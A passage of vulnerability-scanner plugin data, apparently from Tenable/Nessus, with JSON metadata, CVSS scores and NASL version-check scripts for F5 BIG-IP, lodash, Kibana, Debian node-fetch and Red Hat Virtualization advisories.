value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K47105354\";\nvmatrix = make_array();\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"15.0.0-15.1.0\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.2\",\"15.0.1.4\",\"14.1.2.5\",\"13.1.3.4\",\"16.0.0\",\"15.1.1\",\"14.1.2.5\",\"12.1.5.2\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"15.0.0-15.1.0\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.2\",\"15.0.1.4\",\"14.1.2.5\",\"13.1.3.4\",\"16.0.0\",\"15.1.1\",\"14.1.2.5\",\"12.1.5.2\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"15.0.0-15.1.0\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.2\",\"15.0.1.4\",\"14.1.2.5\",\"13.1.3.4\",\"16.0.0\",\"15.1.1\",\"14.1.2.5\",\"12.1.5.2\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"15.0.0-15.1.0\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.2\",\"15.0.1.4\",\"14.1.2.5\",\"13.1.3.4\",\"16.0.0\",\"15.1.1\",\"14.1.2.5\",\"12.1.5.2\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"15.0.0-15.1.0\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.2\",\"15.0.1.4\",\"14.1.2.5\",\"13.1.3.4\",\"16.0.0\",\"15.1.1\",\"14.1.2.5\",\"12.1.5.2\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"15.0.0-15.1.0\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.2\",\"15.0.1.4\",\"14.1.2.5\",\"13.1.3.4\",\"16.0.0\",\"15.1.1\",\"14.1.2.5\",\"12.1.5.2\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"15.0.0-15.1.0\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.2\",\"15.0.1.4\",\"14.1.2.5\",\"13.1.3.4\",\"16.0.0\",\"15.1.1\",\"14.1.2.5\",\"12.1.5.2\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"15.0.0-15.1.0\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.2\",\"15.0.1.4\",\"14.1.2.5\",\"13.1.3.4\",\"16.0.0\",\"15.1.1\",\"14.1.2.5\",\"12.1.5.2\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"15.0.0-15.1.0\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.2\",\"15.0.1.4\",\"14.1.2.5\",\"13.1.3.4\",\"16.0.0\",\"15.1.1\",\"14.1.2.5\",\"12.1.5.2\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-03-23T15:28:35", "description": "According to its self-reported version number, Lodash is prior to 4.17.12. It is, therefore, affected by a prototype pollution vulnerability in the function defaultsDeep which could be tricked into adding or modifying properties of Object.prototype using a constructor payload.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-10-04T00:00:00", "type": "nessus", "title": "Lodash < 4.17.12 Prototype Pollution", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:lodash:lodash:*:*:*:*:*:node.js:*:*"], "id": "WEB_APPLICATION_SCANNING_113008", "href": "https://www.tenable.com/plugins/was/113008", "sourceData": "No source data", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-03-23T15:28:37", "description": "According to its self-reported version number, Lodash is prior to 4.17.20. It is, therefore, affected by a prototype pollution vulnerability in zipObjectDeep.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-10-04T00:00:00", "type": "nessus", "title": "Lodash < 4.17.20 Prototype Pollution", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8203"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:lodash:lodash:*:*:*:*:*:node.js:*:*"], "id": "WEB_APPLICATION_SCANNING_113007", "href": "https://www.tenable.com/plugins/was/113007", "sourceData": "No source data", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-03-23T15:00:24", "description": "According to its self-reported version number, the Kibana application running on the remote host is prior to 6.8.2 or 7.x prior to 7.2.1. It is, therefore, affected by :\n\n - A prototype pollution vulnerability in lodash. (CVE-2019-10744)\n\n - A server-side request forgery (SSRF) vulnerability in the graphite integration for Timelion visualizer. (CVE-2019-7616)\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-03-05T00:00:00", "type": "nessus", "title": "Kibana 7.x < 7.2.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744", "CVE-2019-7616"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:elasticsearch:kibana:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98980", "href": "https://www.tenable.com/plugins/was/98980", "sourceData": "No source data", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-03-23T15:00:24", "description": "According to its self-reported version number, the Kibana application running on the remote host is prior to 6.8.2 or 7.x prior to 7.2.1. It is, therefore, affected by :\n\n - A prototype pollution vulnerability in lodash. (CVE-2019-10744)\n\n - A server-side request forgery (SSRF) vulnerability in the graphite integration for Timelion visualizer. (CVE-2019-7616)\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-03-05T00:00:00", "type": "nessus", "title": "Kibana < 6.8.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744", "CVE-2019-7616"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:elasticsearch:kibana:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98979", "href": "https://www.tenable.com/plugins/was/98979", "sourceData": "No source data", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-01-26T04:22:37", "description": "The remote Debian 10 host has a package installed that is affected by a vulnerability as referenced in the dla-3222 advisory.\n\n - node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor (CVE-2022-0235)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-12-05T00:00:00", "type": "nessus", "title": "Debian DLA-3222-1 : node-fetch - LTS security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0235"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:node-fetch", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DLA-3222.NASL", "href": "https://www.tenable.com/plugins/nessus/168408", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dla-3222. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168408);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2022-0235\");\n\n script_name(english:\"Debian DLA-3222-1 : node-fetch - LTS security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 10 host has a package installed that is affected by a vulnerability as referenced in the dla-3222\nadvisory.\n\n - node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor (CVE-2022-0235)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/node-fetch\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/lts/security/2022/dla-3222\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2022-0235\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/buster/node-fetch\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the node-fetch packages.\n\nFor Debian 10 buster, this problem has been fixed in version 1.7.3-1+deb10u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/12/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:node-fetch\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar debian_release = get_kb_item('Host/Debian/release');\nif ( isnull(debian_release) ) audit(AUDIT_OS_NOT, 'Debian');\ndebian_release = chomp(debian_release);\nif (! preg(pattern:\"^(10)\\.[0-9]+\", string:debian_release)) audit(AUDIT_OS_NOT, 'Debian 10.0', 'Debian ' + debian_release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '10.0', 'prefix': 'node-fetch', 'reference': '1.7.3-1+deb10u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var _release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (_release && prefix && reference) {\n if (deb_check(release:_release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'node-fetch');\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-02-10T14:56:06", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2020:5611 advisory.\n\n - lldpd: buffer overflow in the lldp_decode function in daemon/protocols/lldp.c (CVE-2015-8011)\n\n - nodejs-lodash: prototype pollution in zipObjectDeep function (CVE-2020-8203)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-18T00:00:00", "type": "nessus", "title": "RHEL 8 : Red Hat Virtualization (RHSA-2020:5611)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8011", "CVE-2020-8203"], "modified": "2023-02-02T00:00:00", "cpe": ["cpe:2.3:o:redhat:enterprise_linux:8:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:redhat-virtualization-host-image-update:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:cockpit-ovirt-dashboard:*:*:*:*:*:*:*"], "id": "REDHAT-RHSA-2020-5611.NASL", "href": "https://www.tenable.com/plugins/nessus/144405", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:5611. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144405);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/02\");\n\n script_cve_id(\"CVE-2015-8011\", \"CVE-2020-8203\");\n script_bugtraq_id(77114);\n script_xref(name:\"RHSA\", value:\"2020:5611\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"RHEL 8 : Red Hat Virtualization (RHSA-2020:5611)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:5611 advisory.\n\n - lldpd: buffer overflow in the lldp_decode function in daemon/protocols/lldp.c (CVE-2015-8011)\n\n - nodejs-lodash: prototype pollution in zipObjectDeep function (CVE-2020-8203)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2015-8011\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-8203\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:5611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1857412\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1896536\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected cockpit-ovirt-dashboard and / or redhat-virtualization-host-image-update packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8011\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 120);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cockpit-ovirt-dashboard\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:redhat-virtualization-host-image-update\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/layered/rhel8/ppc64le/rhv-mgmt-agent/4/debug',\n 'content/dist/layered/rhel8/ppc64le/rhv-mgmt-agent/4/os',\n 'content/dist/layered/rhel8/ppc64le/rhv-mgmt-agent/4/source/SRPMS',\n 'content/dist/layered/rhel8/ppc64le/rhv-tools/4/debug',\n 'content/dist/layered/rhel8/ppc64le/rhv-tools/4/os',\n 'content/dist/layered/rhel8/ppc64le/rhv-tools/4/source/SRPMS',\n 'content/dist/layered/rhel8/x86_64/rhv-mgmt-agent/4/debug',\n 'content/dist/layered/rhel8/x86_64/rhv-mgmt-agent/4/os',\n 'content/dist/layered/rhel8/x86_64/rhv-mgmt-agent/4/source/SRPMS',\n 'content/dist/layered/rhel8/x86_64/rhv-tools/4/debug',\n 'content/dist/layered/rhel8/x86_64/rhv-tools/4/os',\n 'content/dist/layered/rhel8/x86_64/rhv-tools/4/source/SRPMS',\n 